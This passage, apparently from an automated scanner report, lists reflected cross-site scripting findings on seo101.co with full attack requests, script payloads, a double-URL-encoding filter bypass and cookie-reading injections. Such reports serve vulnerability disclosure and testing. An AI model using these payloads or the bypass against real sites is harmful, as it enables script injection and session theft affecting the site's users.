User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
</imgbfb0f;alert(1)//df6abbdbd6d/xml-sitemap.jpeg SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b541%253balert%25281%2529%252f%252f01ce04eaf40 was submitted in the REST URL parameter 4. This input was echoed as 8b541;alert(1)//01ce04eaf40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg8b541%253balert%25281%2529%252f%252f01ce04eaf40 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
</img/xml-sitemap.jpeg8b541;alert(1)//01ce04eaf40 SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a487b"><script>alert(1)</script>1fdeb6d84a1 was submitted in the REST URL parameter 4. This input was echoed as a487b\"><script>alert(1)</script>1fdeb6d84a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpega487b"><script>alert(1)</script>1fdeb6d84a1 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
</img/xml-sitemap.jpega487b\"><script>alert(1)</script>1fdeb6d84a1 seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dbbe</script><script>alert(1)</script>f31b1dff3de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C5dbbe</script><script>alert(1)</script>f31b1dff3de/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload ef595><script>alert(1)</script>102cb460ae6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cef595><script>alert(1)</script>102cb460ae6/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 659f2"><script>alert(1)</script>97310d20da1 was submitted in the REST URL parameter 1. This input was echoed as 659f2\"><script>alert(1)</script>97310d20da1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C659f2"><script>alert(1)</script>97310d20da1/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f9127%253balert%25281%2529%252f%252faa3f93e9c93 was submitted in the REST URL parameter 2. This input was echoed as f9127;alert(1)//aa3f93e9c93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cf9127%253balert%25281%2529%252f%252faa3f93e9c93/js/jquery.js HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <f9127;alert(1)//aa3f93e9c93/js/jquery.js SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75959"><script>alert(1)</script>7d89ea9873a was submitted in the REST URL parameter 2. This input was echoed as 75959\"><script>alert(1)</script>7d89ea9873a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C75959"><script>alert(1)</script>7d89ea9873a/js/jquery.js HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <75959\"><script>alert(1)</script>7d89ea9873a/js/jquery.js seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload a92b1><script>alert(1)</script>cd10e7cc5fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/a92b1><script>alert(1)</script>cd10e7cc5fd/js/jquery.js HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</a92b1><script>alert(1)</script>cd10e7cc5fd/js/jquery.js SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ac89b%253balert%25281%2529%252f%252f3a3c1297259 was submitted in the REST URL parameter 3. This input was echoed as ac89b;alert(1)//3a3c1297259 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/jsac89b%253balert%25281%2529%252f%252f3a3c1297259/jquery.js HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/